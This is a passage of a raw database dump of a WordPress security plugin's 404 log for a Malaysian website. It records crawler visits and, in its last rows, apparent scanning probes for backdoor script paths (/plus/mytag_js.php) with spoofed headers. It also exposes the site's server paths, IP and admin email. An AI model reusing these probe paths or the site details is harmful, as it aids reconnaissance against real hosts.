T_URL\";s:8:\"/ads.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZBo9Ke6fKO2vmuLqIBWiAAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569745140.4942\";s:12:\"REQUEST_TIME\";s:10:\"1569745140\";}}','notice','2019-09-29 08:19:04','2019-09-29 08:19:01',35531736,37334344,'https://bintara.com.my/ads.txt',1,0,'54.235.41.4'),(27299,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.106.32.230\";s:11:\"REMOTE_PORT\";s:5:\"49321\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZBzK3upQ8972QULTgzEVAAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569747755.5326\";s:12:\"REQUEST_TIME\";s:10:\"1569747755\";}}','notice','2019-09-29 09:02:39','2019-09-29 09:02:36',35610088,37418072,'https://bintara.com.my/?page_id=11',1,0,'103.106.32.230'),(27300,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.17.148.251\";s:11:\"REMOTE_PORT\";s:5:\"41000\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZCMXWmVMRHwXgK0Y@XvpAAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569754205.4165\";s:12:\"REQUEST_TIME\";s:10:\"1569754205\";}}','notice','2019-09-29 10:50:09','2019-09-29 10:50:06',35135640,36938312,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'185.17.148.251'),(27301,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569754967.4310550689697265625000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569754967.4310550689697265625000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569754967.4310550689697265625000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569754967.4310550689697265625000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"49728\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569754967.4310550689697265625000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZCPV2mVMRHwXgK0Y@XxVAAAABQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZCPV2mVMRHwXgK0Y@XxVAAAABQ\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"49728\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZCPV2mVMRHwXgK0Y@XxVAAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569755874.3493\";s:12:\"REQUEST_TIME\";s:10:\"1569755874\";}}','notice','2019-09-29 11:18:14','2019-09-29 11:17:58',35210744,35463032,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569754967.4310550689697265625000',1,0,'103.6.198.69'),(27302,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/teamviewer-2/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZCVs2mVMRHwXgK0Y@X1MwAAABA\";s:12:\"REDIRECT_URL\";s:14:\"/teamviewer-2/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.217\";s:11:\"REMOTE_PORT\";s:5:\"13012\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:10:\"SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZCVs2mVMRHwXgK0Y@X1MwAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569756601.35\";s:12:\"REQUEST_TIME\";s:10:\"1569756601\";}}','notice','2019-09-29 11:30:22','2019-09-29 11:30:05',34473344,36279080,'https://bintara.com.my/teamviewer-2/',1,0,'207.46.13.217'),(27841,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/plus/mytag_j.php?aid=6022\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"78.129.119.161\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=f57a30c2fdaab294f9042b9436291c47\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"78.129.119.161\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/mytag_j.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/mytag_j.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yvn6YXSDJF91Gv2PydwAAABU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/mytag_j.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/mytag_j.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yvn6YXSDJF91Gv2PydwAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/mytag_j.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/plus/mytag_j.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yvn6YXSDJF91Gv2PydwAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"50638\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/mytag_j.php\";s:10:\"SCRIPT_URL\";s:17:\"/plus/mytag_j.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Yvn6YXSDJF91Gv2PydwAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674878.4337\";s:12:\"REQUEST_TIME\";s:10:\"1570674878\";}}','notice','2019-10-10 02:34:40','2019-10-10 02:34:38',35056096,36857648,'https://bintara.com.my/plus/mytag_j.php?aid=6022',1,0,'78.129.119.161'),(27842,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/plus/mytag_j.phpaid=6022\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"12.105.27.224\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=379fec9ce02eb875bb7ec5d69748057d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"12.105.27.224\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/plus/mytag_j.phpaid=6022\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yx@BT1onqG4TOWhlGKQAAAQw\";s:12:\"REDIRECT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"51233\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/plus/mytag_j.phpaid=6022\";s:10:\"SCRIPT_URL\";s:25:\"/plus/mytag_j.phpaid=6022\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Yx@BT1onqG4TOWhlGKQAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674888.095\";s:12:\"REQUEST_TIME\";s:10:\"1570674888\";}}','notice','2019-10-10 02:34:50','2019-10-10 02:34:48',35043328,36858136,'https://bintara.com.my/plus/mytag_j.phpaid=6022',1,0,'12.105.27.224'),(27843,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/plus/mytag_js.php%20aid=9090\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"213.23.47.13\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=05da9db07cdcbb9af2cbc045529bd4b0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"213.23.47.13\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/plus/mytag_js.php aid=9090\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/plus/mytag_js.php aid=9090\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Y0eBT1onqG4TOWhlGLAAAAQU\";s:12:\"REDIRECT_URL\";s:27:\"/plus/mytag_js.php aid=9090\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"51579\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/plus/mytag_js.php aid=9090\";s:10:\"SCRIPT_URL\";s:27:\"/plus/mytag_js.php 